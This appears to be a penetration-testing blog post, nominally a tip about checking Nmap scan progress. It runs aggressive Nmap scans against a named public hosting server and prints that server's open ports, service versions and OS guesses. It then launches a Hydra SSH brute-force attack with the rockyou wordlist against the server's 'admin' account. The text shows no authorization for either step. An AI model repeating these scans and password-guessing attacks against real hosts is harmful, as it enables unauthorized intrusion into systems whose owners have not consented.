The nmap -A -P0
command line will scan a host and get information about the host and what is running on it. Press j whilst the scan is running to print statistics about the progress of the scan. Press it again to update it.
┌─[root@parrot]─[/home/user] └──╼ #nmap -A -P0 202.146.215.17 Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining) |
Very useful when a scan is taking a very long time to perform and feedback is required on how long it has to go.
We are getting there slowly.
┌─[root@parrot]─[/home/user] └──╼ #nmap -A -P0 202.146.215.17 Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining) Stats: 0:05:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 43.46% done; ETC: 00:01 (0:07:04 remaining) Stats: 0:07:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 47.70% done; ETC: 00:03 (0:07:43 remaining) Stats: 0:07:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 49.39% done; ETC: 00:04 (0:07:50 remaining) Stats: 0:11:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 58.17% done; ETC: 00:07 (0:07:57 remaining) Stats: 0:11:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 58.49% done; ETC: 00:08 (0:07:56 remaining) |
And we are done with our scan. This server has open SSH, FTP and HTTP ports…
Nmap scan report for nix17.qnetau.com (202.146.215.17) Host is up (0.048s latency). Not shown: 941 filtered ports, 55 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ssl-cert: Subject: commonName=*.qnetau.com | Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com | Not valid before: 2013-02-11T00:00:00 |_Not valid after: 2018-02-10T23:59:59 80/tcp open http Apache httpd | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache |_http-title: Quadra Hosting Server 443/tcp open ssl/http Apache httpd | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache |_http-title: Quadra Hosting Server | ssl-cert: Subject: commonName=*.qnetau.com | Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com | Not valid before: 2013-02-11T00:00:00 |_Not valid after: 2018-02-10T23:59:59 |_ssl-date: TLS randomness does not represent time 8022/tcp open ssh OpenSSH 5.3 (protocol 2.0) Aggressive OS guesses: Linux 3.0 (96%), ProVision-ISR security DVR (95%), Linux 2.6.32 (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (93%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (93%), HIKVISION DS-7600 Linux Embedded NVR (Linux 2.6.10) (93%), DD-WRT v24-sp2 (Linux 3.10) (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 6 hops TRACEROUTE (using port 49163/tcp) HOP RTT ADDRESS 1 4.70 ms dsldevice.lan (10.1.1.1) 2 45.69 ms masceqx-lns14.syd.nsw.m2core.net.au (122.148.3.99) 3 44.06 ms 241.02.static.syd.iprimus.net.au (203.134.3.241) 4 52.04 ms 24469.syd.equinix.com (45.127.172.29) 5 50.86 ms ar1.syd1.quadrahosting.com.au (202.146.208.1) 6 41.73 ms nix17.qnetau.com (202.146.215.17) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1862.27 seconds |
Now I can scan the SSH port on the remote server. use the -s parameter to specifiy the SSH port if it is not port 22.
Using this command line: hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh
.
┌─[✗]─[root@parrot]─[/home/user] └──╼ #hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-20 00:30:41 [DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task [DATA] attacking service ssh on port 8022 [STATUS] 17.00 tries/min, 17 tries in 00:01h, 14344385 to do in 14063:08h, 4 active [STATUS] 13.67 tries/min, 41 tries in 00:03h, 14344385 to do in 17493:10h, 4 active [STATUS] 12.71 tries/min, 89 tries in 00:07h, 14344385 to do in 18803:31h, 4 active [STATUS] 12.27 tries/min, 184 tries in 00:15h, 14344344 to do in 19489:36h, 4 active |
I had a lot of problems with this approach as the server has some protection against SSH bruteforce, but there is also an open FTP port as well.
But now I am trying to get more information about the server. Using this command line: nmap -A -P0 -sX 202.146.215.17
.
root@ip-172-31-20-16:~# nmap -A -P0 -sX 202.146.215.17 Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC |
And as before, I can press j to get feedback about the progress of the scan.
root@ip-172-31-20-16:~# nmap -A -P0 -sX 202.146.215.17 Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 6.70% done; ETC: 01:49 (0:04:39 remaining) Stats: 0:04:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 24.50% done; ETC: 01:48 (0:03:11 remaining) |
Now I get a verbose output of the Nmap scan of the target host.
Nmap scan report for nix17.qnetau.com (202.146.215.17) Host is up (0.0029s latency). Not shown: 997 open|filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd |_http-methods: No Allow or Public header in OPTIONS response (status code 200) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Quadra Hosting Server 443/tcp open ssl/http Apache httpd |_http-methods: No Allow or Public header in OPTIONS response (status code 200) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Quadra Hosting Server | ssl-cert: Subject: commonName=*.qnetau.com | Not valid before: 2013-02-11T00:00:00+00:00 |_Not valid after: 2018-02-10T23:59:59+00:00 |_ssl-date: 1985-01-15T10:30:54+00:00; -32y185d15h22m13s from local time. 8022/tcp open ssh OpenSSH 5.3 (protocol 2.0) |_ssh-hostkey: 1024 ec:50:36:e5:e4:11:49:42:d5:fb:b9:0a:b6:e9:1f:13 (DSA) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.18 - 2.6.22 (93%), Linux 3.2.0 (88%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), Netgear DG834G WAP or Western Digital WD TV media player (87%), Linux 3.2.1 (87%), Linux 3.2 (86%), OpenWrt White Russian 0.9 (Linux 2.4.30) (86%) No exact OS matches for host (test conditions non-ideal). Network Distance: 7 hops TRACEROUTE (using proto 1/icmp) HOP RTT ADDRESS 1 1.06 ms ec2-XX-XX-0-20.ap-southeast-2.compute.amazonaws.com (XX.XXX.0.20) 2 2.38 ms XX.XXX.XXX.XXX 3 20.56 ms XX.XX.XX.XX 4 2.32 ms XX.XX.XX.XX 5 2.46 ms 24469.syd.equinix.com (45.127.172.29) 6 3.27 ms ar1.syd1.quadrahosting.com.au (202.146.208.1) 7 2.97 ms nix17.qnetau.com (202.146.215.17) OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2223.22 seconds |
These Nmap tips should help out any budding penetration tester. Good way to get information about the progress of a scan that is taking a very long time to complete.